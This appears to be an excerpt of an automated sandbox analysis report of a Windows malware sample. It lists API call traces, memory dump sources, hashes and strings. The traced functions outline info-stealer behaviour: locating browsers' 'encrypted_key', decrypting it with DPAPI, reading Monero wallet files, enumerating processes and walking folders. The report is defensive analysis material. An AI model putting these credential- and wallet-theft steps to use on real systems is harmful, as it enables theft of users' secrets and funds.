                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,005E1580,005E0D92), ref: 005CF54C
                        • lstrlen.KERNEL32(00000000), ref: 005CF56B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                        • String ID: ^userContextId=4294967295$moz-extension+++
                        • API String ID: 998311485-3310892237
                        • Opcode ID: f18f4b4baec3cb5f6400a887311fc19cb6b20a68c04c79b3f1e8686b11cf8bc6
                        • Instruction ID: 89aac8bef1ae392d1daa0ef66a77b561c098669faac299be4d1212a80a10975f
                        • Opcode Fuzzy Hash: f18f4b4baec3cb5f6400a887311fc19cb6b20a68c04c79b3f1e8686b11cf8bc6
                        • Instruction Fuzzy Hash: 64513571D001499ADB14FBA8DC9ADEE7B38BF94300F40852BF81657291EE345A49CBA6
                        Strings
                        • s], xrefs: 005D72AE, 005D7179, 005D717C
                        • s], xrefs: 005D7111
                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 005D718C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID: s]$s]$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                        • API String ID: 3722407311-79662556
                        • Opcode ID: acc53cb92fd8a896692dd6d8bc90fc0faabb944210d189112a9562636600f46b
                        • Instruction ID: 4c449c4a07050219db7593662a0280d460d8e904b715659e210ed965d42e847b
                        • Opcode Fuzzy Hash: acc53cb92fd8a896692dd6d8bc90fc0faabb944210d189112a9562636600f46b
                        • Instruction Fuzzy Hash: 9F517FB0D0421D9BDB24EB98DC89BEEBB74BF48304F1041ABE51576281EB746E88CF55
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: 524d5c52cd914f358281ab8bc7c27993b78d4cbac2839b43e8a9fa477b62af70
                        • Instruction ID: 7c1566e24363587143ae242cc2c0cf947069a3557b867cf1750b91e87e334c56
                        • Opcode Fuzzy Hash: 524d5c52cd914f358281ab8bc7c27993b78d4cbac2839b43e8a9fa477b62af70
                        • Instruction Fuzzy Hash: B4413F71D10209ABCB18EFE9D849AEEBB74FF54304F00841AE41676390EB759A45CFA2
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005C99EC
                          • Part of subcall function 005C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005C9A11
                          • Part of subcall function 005C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005C9A31
                          • Part of subcall function 005C99C0: ReadFile.KERNEL32(000000FF,?,00000000,005C148F,00000000), ref: 005C9A5A
                          • Part of subcall function 005C99C0: LocalFree.KERNEL32(005C148F), ref: 005C9A90
                          • Part of subcall function 005C99C0: CloseHandle.KERNEL32(000000FF), ref: 005C9A9A
                          • Part of subcall function 005D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 005D8E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 005C9D39
                          • Part of subcall function 005C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N\,00000000,00000000), ref: 005C9AEF
                          • Part of subcall function 005C9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,005C4EEE,00000000,?), ref: 005C9B01
                          • Part of subcall function 005C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N\,00000000,00000000), ref: 005C9B2A
                          • Part of subcall function 005C9AC0: LocalFree.KERNEL32(?,?,?,?,005C4EEE,00000000,?), ref: 005C9B3F
                          • Part of subcall function 005C9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 005C9B84
                          • Part of subcall function 005C9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 005C9BA3
                          • Part of subcall function 005C9B60: LocalFree.KERNEL32(?), ref: 005C9BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2100535398-738592651
                        • Opcode ID: 2066a79e0ae30b5674a86425deeb101a789adf3cfe4c7dc12c4371a4c52d94ff
                        • Instruction ID: fa4972eb4ed493a4e00e8d9a737d5049feea936cef9ed31795e9a7df5a1fbd49
                        • Opcode Fuzzy Hash: 2066a79e0ae30b5674a86425deeb101a789adf3cfe4c7dc12c4371a4c52d94ff
                        • Instruction Fuzzy Hash: A9310DB5D10209AFCB14DBE4DC89FEE7BB8BB48304F54451DE906A7241E7349A04CBA5
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,005E05B7), ref: 005D86CA
                        • Process32First.KERNEL32(?,00000128), ref: 005D86DE
                        • Process32Next.KERNEL32(?,00000128), ref: 005D86F3
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        • CloseHandle.KERNEL32(?), ref: 005D8761
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: 65d06e653cd2d9529b9e6dfc2bd28b2e69868d9dfe1badff66d9e9fa8965f11b
                        • Instruction ID: 9b6a3c3a55413d3da47e9e5e9f9cf832d2db3910170fa66968319208609fc313
                        • Opcode Fuzzy Hash: 65d06e653cd2d9529b9e6dfc2bd28b2e69868d9dfe1badff66d9e9fa8965f11b
                        • Instruction Fuzzy Hash: 51316F71901259ABCB64DF59CC45FEEBB78FB45700F10419BE509A22A0DB306E45CFA1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,005E0E00,00000000,?), ref: 005D79B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D79B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,005E0E00,00000000,?), ref: 005D79C4
                        • wsprintfA.USER32 ref: 005D79F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 14a525e46ae93178b3ed56cdf13eead703c0de841eb599065cacea5567a103ca
                        • Instruction ID: 9846730ab53ca3dcb0d72e7ab2286fe2885b323e405b2cfbc7846ae7c34fa8e5
                        • Opcode Fuzzy Hash: 14a525e46ae93178b3ed56cdf13eead703c0de841eb599065cacea5567a103ca
                        • Instruction Fuzzy Hash: 88112AB2904218ABCB54DFD9DD45BBEBBF8FB4CB11F10411AF605A2280E2395940CBB1
                        APIs
                        • __getptd.LIBCMT ref: 005DC74E
                          • Part of subcall function 005DBF9F: __amsg_exit.LIBCMT ref: 005DBFAF
                        • __getptd.LIBCMT ref: 005DC765
                        • __amsg_exit.LIBCMT ref: 005DC773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 005DC797
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: db74730de1725eae242100a26a0aba466b5babf038da0f7002b10cdb773b4f60
                        • Instruction ID: 61805dfc3afc6c61c6e3b7014d167d710912378f8449244fc6e3c95d2856d329
                        • Opcode Fuzzy Hash: db74730de1725eae242100a26a0aba466b5babf038da0f7002b10cdb773b4f60
                        • Instruction Fuzzy Hash: A6F04932904603DAEB35BBBC984AB4A3FA1BF80721F21414BF444AA3D2DB646941DA56
                        APIs
                          • Part of subcall function 005D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 005D8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 005D4F7A
                        • lstrcat.KERNEL32(?,005E1070), ref: 005D4F97
                        • lstrcat.KERNEL32(?,014A8948), ref: 005D4FAB
                        • lstrcat.KERNEL32(?,005E1074), ref: 005D4FBD
                          • Part of subcall function 005D4910: wsprintfA.USER32 ref: 005D492C
                          • Part of subcall function 005D4910: FindFirstFileA.KERNEL32(?,?), ref: 005D4943
                          • Part of subcall function 005D4910: StrCmpCA.SHLWAPI(?,005E0FDC), ref: 005D4971
                          • Part of subcall function 005D4910: StrCmpCA.SHLWAPI(?,005E0FE0), ref: 005D4987
                          • Part of subcall function 005D4910: FindNextFileA.KERNEL32(000000FF,?), ref: 005D4B7D
                          • Part of subcall function 005D4910: FindClose.KERNEL32(000000FF), ref: 005D4B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: 58d742c6dc4aecf89a95789e7d1cfea2ad12b1d1cc9119059aaefc6b551e8e6a
                        • Instruction ID: 9259e683ca95305a5381409ae9ddf065c6c47a6064e2564219e674f00f819477
                        • Opcode Fuzzy Hash: 58d742c6dc4aecf89a95789e7d1cfea2ad12b1d1cc9119059aaefc6b551e8e6a
                        • Instruction Fuzzy Hash: F8219B769003096BC7A8F7B4DC5AEED373CB794300F004559B69A52181EE7496C98F92